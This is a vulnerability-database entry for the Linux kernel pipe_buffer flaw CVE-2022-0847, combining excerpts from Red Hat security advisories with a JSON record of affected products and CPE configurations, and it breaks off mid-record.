All the vulnerabilites related to SonicWall - SMA1000
var-202203-0043
Vulnerability from variot

A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. Linux Kernel Has an initialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Summary:

The Migration Toolkit for Containers (MTC) 1.5.4 is now available. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):

1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic

  1. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.3.8 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/

Security updates:

  • nanoid: Information disclosure via valueOf() function (CVE-2021-23566)

  • nodejs-shelljs: improper privilege management (CVE-2022-0144)

  • follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)

  • node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)

  • follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)

Bug fix:

  • RHACM 2.3.8 images (Bugzilla #2062316)

  • Bugs fixed (https://bugzilla.redhat.com/):

2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management 2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2062316 - RHACM 2.3.8 images

  1. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

  2. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel-rt security and bug fix update Advisory ID: RHSA-2022:0819-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:0819 Issue date: 2022-03-10 CVE Names: CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 CVE-2022-22942 =====================================================================

  1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64 Red Hat Enterprise Linux for Real Time (v. 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

  • kernel: improper initialization of the "flags" member of the new pipe_buffer (CVE-2022-0847)

  • kernel: Use After Free in unix_gc() which could result in a local privilege escalation (CVE-2021-0920)

  • kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout (CVE-2021-4154)

  • kernel: possible privileges escalation due to missing TLB flush (CVE-2022-0330)

  • kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS (CVE-2022-0435)

  • kernel: cgroups v1 release_agent feature may allow privilege escalation (CVE-2022-0492)

  • kernel: failing usercopy allows for use-after-free exploitation (CVE-2022-22942)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • kernel symbol '__rt_mutex_init' is exported GPL-only in kernel 4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)

  • kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree (BZ#2045589)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation 2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout 2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush 2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation 2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS 2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation 2060795 - CVE-2022-0847 kernel: improper initialization of the "flags" member of the new pipe_buffer

  1. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 8):

Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm

x86_64: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 8):

Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm

x86_64: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2021-0920 https://access.redhat.com/security/cve/CVE-2021-4154 https://access.redhat.com/security/cve/CVE-2022-0330 https://access.redhat.com/security/cve/CVE-2022-0435 https://access.redhat.com/security/cve/CVE-2022-0492 https://access.redhat.com/security/cve/CVE-2022-0847 https://access.redhat.com/security/cve/CVE-2022-22942 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/RHSB-2022-002

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl ISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k ord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t /AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG IODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F GbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ ypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW IOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm QfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j KIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE X1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w nEhPbkKSmMY= =CLN6 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202203-0043",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "codeready linux builder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.8"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.16.11"
      },
      {
        "model": "ovirt-engine",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ovirt",
        "version": "4.4.10.2"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for ibm z systems eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2-02044"
      },
      {
        "model": "enterprise linux for power little endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "scalance lpe9403",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.0"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.15"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for ibm z systems eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.15.25"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux for power little endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.16"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.102"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": "sma1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": null
      },
      {
        "model": "red hat enterprise linux eus",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "h300s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ovirt-engine",
        "scope": null,
        "trust": 0.8,
        "vendor": "ovirt",
        "version": null
      },
      {
        "model": "red hat enterprise linux for ibm z systems - extended update support",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "red hat enterprise linux for ibm z systems",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "red hat enterprise linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "scalance lpe9403",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.16.11",
                "versionStartIncluding": "5.16",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.15.25",
                "versionStartIncluding": "5.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.102",
                "versionStartIncluding": "5.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:codeready_linux_builder:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ovirt:ovirt-engine:4.4.10.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
